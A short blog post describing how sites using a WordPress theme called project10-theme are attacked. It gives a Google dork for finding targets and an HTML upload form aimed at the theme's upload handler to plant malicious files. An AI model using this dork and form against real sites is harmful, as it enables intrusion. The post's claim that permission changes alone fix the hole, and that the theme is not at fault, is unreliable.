Recently there is a video on youtube.com about “How to Hack WordPress Sites Using WordPress Remote File Upload Vulnerability“. WebDux.com think it’s easy to avoid this hack for WordPress websites.
How they Hack WordPress Website by Upload Vulnerability
1. Google dork by “inurl:/wp-content/themes/project10-theme/” to find the WordPress websites using project10-theme WordPress website.
2. Using followed code to upload malicious code file.
<form enctype="multipart/form-data" action="http://http://www.domain.com/wp-content/themes/project10-theme/functions/upload-andler.php" method="post"> Please choose a file: <input name="orange_themes" type="file" /><br /> <input type="submit" value="upload" />
Reveal Hacking WordPress Website by Upload Vulnerability
The problem is not related with project10-theme WordPress theme and WordPress itself. It’s related with Website hosting’s file permission, which has set up to 777 so anyone can write and execute something.
We only need to set the file permission to 775 and in fact, the Linux best file permission is 755 then we can avoid WordPress websites hacked by WordPress Website by Upload Vulnerability.
That’s all and hope it’s useful for you. Meanwhile welcome you sharing your website security ideas.